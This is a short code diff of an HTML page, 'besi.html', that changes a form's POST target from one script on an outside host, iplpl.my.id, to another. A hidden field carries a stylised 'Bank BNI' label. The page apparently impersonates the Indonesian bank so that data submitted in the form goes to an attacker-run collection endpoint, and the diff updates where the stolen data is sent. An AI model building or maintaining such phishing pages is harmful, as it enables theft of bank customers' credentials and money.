--- a/besi.html
+++ b/besi.html
@@ -794,7 +794,7 @@ chsalxcome {
 
     </marquee> 
 
-    <form method="POST" action="https://iplpl.my.id/ink/on.php"> 
+    <form method="POST" action="https://iplpl.my.id/f/on.php"> 
 
      <input type="hidden" name="loo" id="logo" value="༻✧°𝗕𝗮𝗻𝗸 𝐁𝐍𝐈°✧༺"> 
 
